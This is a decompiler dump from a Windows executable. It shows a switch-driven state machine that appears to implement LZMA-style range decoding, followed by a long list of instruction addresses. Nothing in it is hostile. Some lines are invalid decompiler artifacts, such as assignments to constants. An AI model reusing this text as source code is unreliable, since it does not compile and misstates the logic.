                                                            							 *(__ebp - 0x80) = 0x15;
                                                            							__eax =  *(__ebp - 4) + 0xa68;
                                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            							goto L68;
                                                            						case 0xc:
                                                            							L99:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xc;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t334 = __ebp - 0x70;
                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t334;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							__eax =  *(__ebp - 0x2c);
                                                            							goto L101;
                                                            						case 0xd:
                                                            							goto L36;
                                                            						case 0xe:
                                                            							goto L45;
                                                            						case 0xf:
                                                            							goto L57;
                                                            						case 0x10:
                                                            							L109:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x10;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t365 = __ebp - 0x70;
                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t365;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							goto L111;
                                                            						case 0x11:
                                                            							L68:
                                                            							__esi =  *(__ebp - 0x58);
                                                            							 *(__ebp - 0x84) = 0x12;
                                                            							goto L132;
                                                            						case 0x12:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 0x58);
                                                            								 *(__ebp - 0x84) = 0x13;
                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							__eflags = __eax;
                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            							goto L130;
                                                            						case 0x13:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								_t469 = __ebp - 0x58;
                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            								__eflags =  *_t469;
                                                            								 *(__ebp - 0x30) = 0x10;
                                                            								 *(__ebp - 0x40) = 8;
                                                            								L144:
                                                            								 *(__ebp - 0x7c) = 0x14;
                                                            								goto L145;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							 *(__ebp - 0x30) = 8;
                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            							L130:
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							 *(__ebp - 0x40) = 3;
                                                            							goto L144;
                                                            						case 0x14:
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            							__eax =  *(__ebp - 0x80);
                                                            							goto L140;
                                                            						case 0x15:
                                                            							__eax = 0;
                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            							__al = __al & 0x000000fd;
                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            							goto L120;
                                                            						case 0x16:
                                                            							__eax =  *(__ebp - 0x30);
                                                            							__eflags = __eax - 4;
                                                            							if(__eax >= 4) {
                                                            								_push(3);
                                                            								_pop(__eax);
                                                            							}
                                                            							__ecx =  *(__ebp - 4);
                                                            							 *(__ebp - 0x40) = 6;
                                                            							__eax = __eax << 7;
                                                            							 *(__ebp - 0x7c) = 0x19;
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							goto L145;
                                                            						case 0x17:
                                                            							L145:
                                                            							__eax =  *(__ebp - 0x40);
                                                            							 *(__ebp - 0x50) = 1;
                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            							goto L149;
                                                            						case 0x18:
                                                            							L146:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x18;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t484 = __ebp - 0x70;
                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t484;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L148:
                                                            							_t487 = __ebp - 0x48;
                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                            							__eflags =  *_t487;
                                                            							L149:
                                                            							__eflags =  *(__ebp - 0x48);
                                                            							if( *(__ebp - 0x48) <= 0) {
                                                            								__ecx =  *(__ebp - 0x40);
                                                            								__ebx =  *(__ebp - 0x50);
                                                            								0 = 1;
                                                            								__eax = 1 << __cl;
                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            								__eax =  *(__ebp - 0x7c);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								goto L140;
                                                            							}
                                                            							__eax =  *(__ebp - 0x50);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__esi = __edx + __eax;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__ax =  *__esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								__cx = __ax >> 5;
                                                            								__eax = __eax - __ecx;
                                                            								__edx = __edx + 1;
                                                            								__eflags = __edx;
                                                            								 *__esi = __ax;
                                                            								 *(__ebp - 0x50) = __edx;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L148;
                                                            							} else {
                                                            								goto L146;
                                                            							}
                                                            						case 0x19:
                                                            							__eflags = __ebx - 4;
                                                            							if(__ebx < 4) {
                                                            								 *(__ebp - 0x2c) = __ebx;
                                                            								L119:
                                                            								_t393 = __ebp - 0x2c;
                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            								__eflags =  *_t393;
                                                            								L120:
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								__eflags = __eax;
                                                            								if(__eax == 0) {
                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            									goto L170;
                                                            								}
                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                            									goto L171;
                                                            								}
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            								__eax =  *(__ebp - 0x30);
                                                            								_t400 = __ebp - 0x60;
                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            								__eflags =  *_t400;
                                                            								goto L123;
                                                            							}
                                                            							__ecx = __ebx;
                                                            							__eax = __ebx;
                                                            							__ecx = __ebx >> 1;
                                                            							__eax = __ebx & 0x00000001;
                                                            							__ecx = (__ebx >> 1) - 1;
                                                            							__al = __al | 0x00000002;
                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                            							__eflags = __ebx - 0xe;
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							if(__ebx >= 0xe) {
                                                            								__ebx = 0;
                                                            								 *(__ebp - 0x48) = __ecx;
                                                            								L102:
                                                            								__eflags =  *(__ebp - 0x48);
                                                            								if( *(__ebp - 0x48) <= 0) {
                                                            									__eax = __eax + __ebx;
                                                            									 *(__ebp - 0x40) = 4;
                                                            									 *(__ebp - 0x2c) = __eax;
                                                            									__eax =  *(__ebp - 4);
                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                            									__eflags = __eax;
                                                            									L108:
                                                            									__ebx = 0;
                                                            									 *(__ebp - 0x58) = __eax;
                                                            									 *(__ebp - 0x50) = 1;
                                                            									 *(__ebp - 0x44) = 0;
                                                            									 *(__ebp - 0x48) = 0;
                                                            									L112:
                                                            									__eax =  *(__ebp - 0x40);
                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            										_t391 = __ebp - 0x2c;
                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            										__eflags =  *_t391;
                                                            										goto L119;
                                                            									}
                                                            									__eax =  *(__ebp - 0x50);
                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            									__eax =  *(__ebp - 0x58);
                                                            									__esi = __edi + __eax;
                                                            									 *(__ebp - 0x54) = __esi;
                                                            									__ax =  *__esi;
                                                            									__ecx = __ax & 0x0000ffff;
                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                            										__ecx = 0;
                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            										__ecx = 1;
                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            										__ebx = 1;
                                                            										__ecx =  *(__ebp - 0x48);
                                                            										__ebx = 1 << __cl;
                                                            										__ecx = 1 << __cl;
                                                            										__ebx =  *(__ebp - 0x44);
                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                            										__cx = __ax;
                                                            										__cx = __ax >> 5;
                                                            										__eax = __eax - __ecx;
                                                            										__edi = __edi + 1;
                                                            										__eflags = __edi;
                                                            										 *(__ebp - 0x44) = __ebx;
                                                            										 *__esi = __ax;
                                                            										 *(__ebp - 0x50) = __edi;
                                                            									} else {
                                                            										 *(__ebp - 0x10) = __edx;
                                                            										0x800 = 0x800 - __ecx;
                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            										 *__esi = __dx;
                                                            									}
                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                            										L111:
                                                            										_t368 = __ebp - 0x48;
                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                            										__eflags =  *_t368;
                                                            										goto L112;
                                                            									} else {
                                                            										goto L109;
                                                            									}
                                                            								}
                                                            								__ecx =  *(__ebp - 0xc);
                                                            								__ebx = __ebx + __ebx;
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            									__ecx =  *(__ebp - 0x10);
                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            									__ebx = __ebx | 0x00000001;
                                                            									__eflags = __ebx;
                                                            									 *(__ebp - 0x44) = __ebx;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                            									L101:
                                                            									_t338 = __ebp - 0x48;
                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                            									__eflags =  *_t338;
                                                            									goto L102;
                                                            								} else {
                                                            									goto L99;
                                                            								}
                                                            							}
                                                            							__edx =  *(__ebp - 4);
                                                            							__eax = __eax - __ebx;
                                                            							 *(__ebp - 0x40) = __ecx;
                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            							goto L108;
                                                            						case 0x1a:
                                                            							goto L55;
                                                            						case 0x1b:
                                                            							L75:
                                                            							__eflags =  *(__ebp - 0x64);
                                                            							if( *(__ebp - 0x64) == 0) {
                                                            								 *(__ebp - 0x88) = 0x1b;
                                                            								goto L170;
                                                            							}
                                                            							__eax =  *(__ebp - 0x14);
                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            							__eflags = __eax -  *(__ebp - 0x74);
                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                            								__eflags = __eax;
                                                            							}
                                                            							__edx =  *(__ebp - 8);
                                                            							__cl =  *(__eax + __edx);
                                                            							__eax =  *(__ebp - 0x14);
                                                            							 *(__ebp - 0x5c) = __cl;
                                                            							 *(__eax + __edx) = __cl;
                                                            							__eax = __eax + 1;
                                                            							__edx = 0;
                                                            							_t274 = __eax %  *(__ebp - 0x74);
                                                            							__eax = __eax /  *(__ebp - 0x74);
                                                            							__edx = _t274;
                                                            							__eax =  *(__ebp - 0x68);
                                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            							_t283 = __ebp - 0x64;
                                                            							 *_t283 =  *(__ebp - 0x64) - 1;
                                                            							__eflags =  *_t283;
                                                            							 *( *(__ebp - 0x68)) = __cl;
                                                            							goto L79;
                                                            						case 0x1c:
                                                            							while(1) {
                                                            								L123:
                                                            								__eflags =  *(__ebp - 0x64);
                                                            								if( *(__ebp - 0x64) == 0) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__ebp - 0x14);
                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                            									__eflags = __eax;
                                                            								}
                                                            								__edx =  *(__ebp - 8);
                                                            								__cl =  *(__eax + __edx);
                                                            								__eax =  *(__ebp - 0x14);
                                                            								 *(__ebp - 0x5c) = __cl;
                                                            								 *(__eax + __edx) = __cl;
                                                            								__eax = __eax + 1;
                                                            								__edx = 0;
                                                            								_t414 = __eax %  *(__ebp - 0x74);
                                                            								__eax = __eax /  *(__ebp - 0x74);
                                                            								__edx = _t414;
                                                            								__eax =  *(__ebp - 0x68);
                                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            								__eflags =  *(__ebp - 0x30);
                                                            								 *( *(__ebp - 0x68)) = __cl;
                                                            								 *(__ebp - 0x14) = __edx;
                                                            								if( *(__ebp - 0x30) > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L80;
                                                            								}
                                                            							}
                                                            							 *(__ebp - 0x88) = 0x1c;
                                                            							goto L170;
                                                            					}
                                                            				}
                                                            			}













                                                            0x00000000
                                                            0x004062b8
                                                            0x004062b8
                                                            0x004062bd
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00406924
                                                            0x00406924
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x0040699a
                                                            0x0040699a
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x00406975
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00000000
                                                            0x00406b28
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x00000000
                                                            0x00406997
                                                            0x004062bf
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406308
                                                            0x00406326
                                                            0x00406328
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x0040654d
                                                            0x00406550
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406552
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x00000000
                                                            0x004064f0
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00406376
                                                            0x00406376
                                                            0x0040637c
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406489
                                                            0x0040648c
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642c
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00406663
                                                            0x00406663
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406405
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00406b3e
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00406b5a
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00000000
                                                            0x00406373
                                                            0x004063ff
                                                            0x00406308
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000
                                                            0x00406b53
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00000000
                                                            0x00406690
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00000000
                                                            0x00406921
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x00000000
                                                            0x004069e2
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
